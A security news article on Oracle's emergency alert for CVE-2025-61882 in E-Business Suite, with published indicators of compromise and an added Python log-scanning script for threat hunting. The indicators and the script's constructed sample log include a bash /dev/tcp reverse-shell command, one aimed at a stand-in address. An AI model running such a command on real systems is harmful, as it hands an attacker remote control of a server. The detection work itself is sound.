Oracle has issued an emergency Security Alert addressing a critical vulnerability (CVE-2025-61882) in Oracle E-Business Suite, warning that the flaw can be remotely exploited without authentication to achieve remote code execution (RCE). The vulnerability has been assigned a CVSS score of 9.8, underscoring its severity and potential for widespread exploitation.
According to the advisory, “This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in remote code execution.”
That means attackers could compromise affected Oracle E-Business Suite systems simply by sending crafted network requests, allowing them to run arbitrary commands on the server without needing valid credentials. Such an attack could result in full compromise of business-critical applications, data exfiltration, or lateral movement within enterprise environments.
The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14.
Oracle’s patch is now available, but the company cautions that “the October 2023 Critical Patch Update is a prerequisite for application of the updates in this Security Alert.” Customers must therefore confirm that the October 2023 CPU has already been applied to each affected instance before the Security Alert patch can be installed; environments that have fallen behind on CPUs will need to catch up first, which lengthens the exposure window.
The vendor emphasized urgency: “Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”
To assist organizations with immediate threat hunting, Oracle included several Indicators of Compromise (IOCs) that have been observed in active exploitation attempts:
- Malicious IP addresses:
- 200[.]107[.]207[.]26
- 185[.]181[.]60[.]11
- Observed commands:
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 — a bash reverse shell: an interactive shell whose stdin, stdout, and stderr are redirected through bash’s /dev/tcp pseudo-device to an attacker-controlled host and port (the host and port are left blank in the published indicator), giving the attacker interactive command execution on the server.
- Associated file hashes (SHA-256):
- 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
- aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
- 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b
These indicators suggest that attackers are already exploiting vulnerable Oracle environments in the wild. Organizations are urged to cross-check web server access logs, process-execution and audit logs, and network telemetry for inbound requests from these IPs, outbound connections from EBS application-tier hosts, execution of similar /dev/tcp shell commands, and files matching the listed hashes.
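The following is an added example, not code from Oracle’s advisory or from the original article, showing how a responder might run the published indicators over log data: it refangs the defanged IPs, matches the reverse-shell pattern with the host and port treated as a wildcard so any attacker-chosen destination is caught, and compares SHA-256 digests against the published hashes. The log lines, the 192.0.2.10:4444 reverse-shell target, and the request paths are constructed for the example and are not observed data.

```python
import hashlib
import re

# IOCs as published in Oracle's Security Alert for CVE-2025-61882 (defanged as on the page).
MALICIOUS_IPS_DEFANGED = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
MALICIOUS_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}


def refang(ioc):
    """Turn a defanged indicator such as 200[.]107[.]207[.]26 back into a matchable string."""
    return ioc.replace("[.]", ".")


MALICIOUS_IPS = {refang(ip) for ip in MALICIOUS_IPS_DEFANGED}

# Bash reverse shell: interactive shell with stdout/stderr redirected to the /dev/tcp
# pseudo-device and stdin duplicated from it. The host/port segment is a wildcard because
# the published indicator leaves it blank and an attacker can substitute any destination.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/[^\s]*\s+0>&1")


def scan_log_line(line):
    """Return a list of (indicator_kind, matched_value) for one log line."""
    hits = []
    for ip in MALICIOUS_IPS:
        # Anchor on non-digit/non-dot boundaries so 10.200.107.207.26x-style strings do not match.
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
            hits.append(("ip", ip))
    match = REVERSE_SHELL_RE.search(line)
    if match:
        hits.append(("reverse_shell", match.group(0)))
    return hits


def scan_log(lines):
    """Scan an iterable of log lines; returns (line_number, kind, value) tuples."""
    return [(n, kind, value) for n, line in enumerate(lines, 1) for kind, value in scan_log_line(line)]


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_known_malicious(hexdigest):
    return hexdigest.lower() in MALICIOUS_SHA256


# Constructed sample data (not real telemetry): a web-tier access log line from a listed IP,
# a benign request, an auditd EXECVE record of a reverse shell, and a benign EXECVE record
# with an ordinary 2>&1 redirection that must not trigger the reverse-shell rule.
SAMPLE_LOG = [
    '200.107.207.26 - - [05/Oct/2025:10:12:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 2048',
    '10.0.0.5 - - [05/Oct/2025:10:12:03 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 2048',
    'type=EXECVE msg=audit(1759658000.100:42): argc=3 a0="sh" a1="-c" '
    'a2="/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
    'type=EXECVE msg=audit(1759658001.200:43): argc=3 a0="sh" a1="-c" a2="ls -la /tmp 2>&1"',
]

if __name__ == "__main__":
    for lineno, kind, value in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {kind} -> {value}")
```

In practice the listed-IP check should run over proxy and load balancer logs in front of the EBS web tier as well as the application tier itself, and the reverse-shell check belongs in whatever process-execution telemetry the host already emits (auditd EXECVE records, EDR process events); the hash check is only useful for files that survive on disk, so it is the weakest of the three.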
It is unclear whether this vulnerability is related to Oracle’s recent cybersecurity incident. Recently, cybersecurity experts have been on high alert as a group claiming ties to the infamous Cl0p ransomware gang bombards global companies with threatening emails claiming to possess stolen data from Oracle’s E-Business Suite, a mission-critical platform for managing finance, HR, and supply chain operations.
The activity, which began on or before September 29, 2025, has prompted urgent investigations by both Mandiant and the Google Threat Intelligence Group (GTIG), as organizations scramble to determine whether their systems have been breached or if the campaign is purely an extortion ploy.
In response to the campaign, Oracle issued a Security Alert confirming awareness of the extortion attempts targeting Oracle E-Business Suite (EBS) customers.
Rob Duhart, Oracle’s Chief Security Officer, stated: “Oracle is aware that some Oracle E-Business Suite customers have received extortion emails. Our ongoing investigation has found the potential use of previously identified vulnerabilities that are addressed in the July 2025 Critical Patch Update.”